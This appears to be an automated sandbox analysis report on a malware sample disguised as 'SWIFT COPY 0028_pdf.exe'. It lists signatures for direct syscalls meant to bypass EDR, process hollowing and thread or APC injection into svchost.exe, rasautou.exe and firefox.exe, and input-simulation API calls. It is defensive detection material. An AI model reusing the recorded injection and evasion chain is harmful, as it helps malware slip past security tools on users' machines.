                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]2_2_03C30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]2_2_03D04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]2_2_03C68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]2_2_03C86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]2_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]2_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]2_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]2_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]2_2_03C6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]2_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]2_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]2_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h]2_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]2_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]2_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]2_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]2_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h]2_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]2_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]2_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]2_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]2_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0095A66C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00948189 SetUnhandledExceptionFilter,0_2_00948189
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009481AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\rasautou.exeThread register set: target process: 5708Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\rasautou.exeThread APC queued: target process: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3062008Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095B106 LogonUserW,0_2_0095B106
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00923D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00923D19
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096411C SendInput,keybd_event,0_2_0096411C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009674BB mouse_event,0_2_009674BB
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeProcess created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0095A66C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009671FA
                Source: nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: SWIFT COPY 0028_pdf.exe, nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: SWIFT COPY 0028_pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: nBMWUKLuWlMJko.exe, 00000003.00000002.4612381742.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000000.2235766884.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4612596212.00000000017B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009465C4 cpuid 0_2_009465C4
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0097091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0097091D
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0099B340 GetUserNameW,0_2_0099B340
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00951E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00951E8E
